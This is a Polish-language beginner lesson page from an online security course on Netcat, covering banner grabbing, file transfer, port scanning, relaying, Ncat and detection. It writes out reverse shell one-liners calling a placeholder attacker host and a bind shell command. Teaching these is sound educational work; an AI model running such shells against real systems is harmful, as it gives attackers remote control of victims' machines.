Netcat: szwajcarski scyzoryk
Wykorzystają Państwo nc do pobierania bannerów, przesyłania plików, przekierowywania portów i tworzenia prostych powłok zwrotnych.
Netcat: szwajcarski scyzoryk to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 3 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Czym jest Netcat
Netcat (nc) to narzędzie, które odczytuje i zapisuje dane za pośrednictwem połączeń sieciowych TCP lub UDP. Jest zainstalowane niemal w każdym systemie uniksowym i jest niezwykle przydatne do debugowania, przesyłania plików oraz podstawowego wykorzystywania luk.
Podstawowe nawiązywanie połączenia i pobieranie banera
Połącz się z dowolnym portem TCP, aby pobrać baner usługi i ręcznie komunikować się z protokołem. To najprostsza forma rozpoznania.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPNasłuchiwanie na porcie
Netcat może nasłuchiwać połączeń przychodzących za pomocą -l -p. Jest to przydatne do testowania łączności, przechwytywania powłok zwrotnych i odbierania plików.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberPrzesyłanie plików za pomocą Netcat
Netcat może wysyłać pliki przez przekierowanie ich do połączenia. Odbiorca nasłuchuje i przekierowuje dane wyjściowe do pliku. Brak szyfrowania — używaj wyłącznie w zaufanych sieciach.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtSkanowanie portów za pomocą Netcat
Netcat umożliwia podstawowe skanowanie portów za pomocą -z (tryb bez wejścia/wyjścia) i -w (limit czasu). Jest wolniejszy od Nmapa, ale przydatny, gdy Nmap jest niedostępny.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Prosta powłoka zwrotna
Powłoka zwrotna powoduje, że cel łączy się z powrotem z atakującym. Jest przydatna podczas testów penetracyjnych, gdy reguły zapory blokują połączenia przychodzące do celu.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashPowłoka bind
Powłoka bind nasłuchuje na komputerze celu. Atakujący łączy się z tą powłoką. Jest rzadziej używana we współczesnych testach penetracyjnych, ponieważ zapory zwykle blokują połączenia przychodzące.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555Tryb UDP
Użyj -u do nawiązywania połączeń UDP. Jest to przydatne do testowania usług UDP, takich jak DNS (port 53) i SNMP (port 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Pośredniczenie za pomocą Netcat
Netcat może łączyć połączenia w łańcuch, aby umożliwić przechodzenie między sieciami. W połączeniu z potokami nazwanymi (mkfifo) tworzy proste tunele dwukierunkowe bez dodatkowych narzędzi.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: nowoczesna alternatywa
Ncat (część Nmapa) rozszerza Netcat o obsługę SSL (--ssl), kontrolę dostępu i tryb pośrednika. W przypadku szyfrowanych kanałów należy preferować Ncat.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Obrońcy: wykrywanie Netcat
Połączenia Netcat wyglądają jak zwykły ruch TCP. Obrońcy wykrywają je przez monitorowanie nazw procesów (HIDS), nietypowych portów wychodzących oraz powłok uruchomionych przez nieoczekiwane procesy nadrzędne.
Szybki test
Jaka flaga Netcat włącza tryb nasłuchiwania?
Podsumowanie: Netcat
Netcat to podstawowe narzędzie: używaj go do pobierania banerów, przesyłania plików, testowania łączności oraz poznawania mechanizmów powłok zwrotnych i bind. W autoryzowanych testach penetracyjnych służy do weryfikowania reguł zapory i symulowania przemieszczania się atakującego w sieci. Należy dobrze je znać — zarówno po to, aby go używać, jak i aby go wykrywać.
Często zadawane pytania
Czy lekcja „Netcat: szwajcarski scyzoryk” jest bezpłatna?
Tak — pełny tekst „Netcat: szwajcarski scyzoryk” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Netcat: szwajcarski scyzoryk”?
Wykorzystają Państwo nc do pobierania bannerów, przesyłania plików, przekierowywania portów i tworzenia prostych powłok zwrotnych. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?
Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 3 z 4.
Ile czasu zajmuje lekcja „Netcat: szwajcarski scyzoryk”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?
Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Techniki skanowania portów w Nmap
- Rozpoznawanie usług i systemów operacyjnych
- Netcat: szwajcarski scyzoryk
- Skrypty do enumeracji sieci